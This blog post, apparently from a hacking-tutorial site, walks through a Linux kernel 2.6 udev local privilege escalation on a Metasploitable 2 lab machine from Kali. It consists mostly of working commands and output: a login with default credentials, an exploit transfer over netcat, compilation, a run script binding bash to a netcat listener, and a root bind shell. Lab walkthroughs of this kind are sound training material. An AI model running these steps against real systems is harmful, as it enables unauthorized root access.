metalkey

Hacking tutorials + info

Linux Kernel 2.6 UDEV < 141 – Local Privilege Escalation Exploit Example

July 02, 2016 — metalkey
Attacker: Kali Linux
Victim: Metasploitable 2

Note: This exploit leverages a vulnerability in NETLINK.
More information on NETLINK can be found on the Linux Foundation website (http://www.linuxfoundation.org/collaborate/workgroups/networking/generic_netlink_howto).

Download the Exploit from ExploitDB

Head over to the Exploit Database and download Jon Oberheide’s udev exploit for Linux Kernel 2.6 (https://www.exploit-db.com/exploits/8572/).

Telnet to Metasploitable 2, then Upload and Compile the Exploit

Telnet to Metasploitable 2 then start a netcat listener.
In Kali, We’re going to tar the exploit and pipe the output to netcat.
In Metasploitable 2, we’re going to receive and untar the exploit, then compile it with gcc.

root@kali:~$ telnet 192.168.1.10
Trying 192.168.1.10...
Connected to 192.168.1.10.

Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password: msfadmin
Linux metasploitable 2.6.24-16-server #1 SMP i686

msfadmin@metasploitable:~$ nc -lvp 12345 | tar -xf -
listening on [any] 12345 ...

Open a new tab, tar the exploit and pipe the output to netcat

root@kali:~$ tar -cf - 8572.c | nc -vn 192.168.1.10 12345
(UNKNOWN) [192.168.1.10] 12345 (?) open

Back in the first tab we can see our Kali Machine connect.
Allow a few seconds for the file transfer to complete then CTRL+C to end the session.
Check the exploit has been received, then compile with gcc.

connect to [192.168.1.10] from kali [192.168.1.182] 48411
msfadmin@metasploitable:~$ ls -lah 8572.c
-rw-r--r-- 1 msfadmin msfadmin 2.9K 2015-11-05 04:14 8572.c
msfadmin@metasploitable:~$ gcc 8572.c -o 8572

Executing the Exploit

Now we just need to get the PID of the the udevd netlink socket on Metasploitable 2, create our run script (bind an instance of bash to a netcat listener) and execute the exploit

msfadmin@metasploitable:~$ cat /proc/net/netlink
df552800 15 2738 00000001 0 0 00000000 2
msfadmin@metasploitable:~$ cd /tmp
msfadmin@metasploitable:/tmp$ nano run
#!/bin/bash
nc -lvvp 2345 -e /bin/bash
msfadmin@metasploitable:/tmp$ cd
msfadmin@metasploitable:~$ ./8572 2738

Open a new tab and connect to the bind shell

root@kali:~$ nc -vn 192.168.1.10 2345
(UNKNOWN) [192.168.1.10] 2345 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/# whoami
root

Tags: privilege-escalation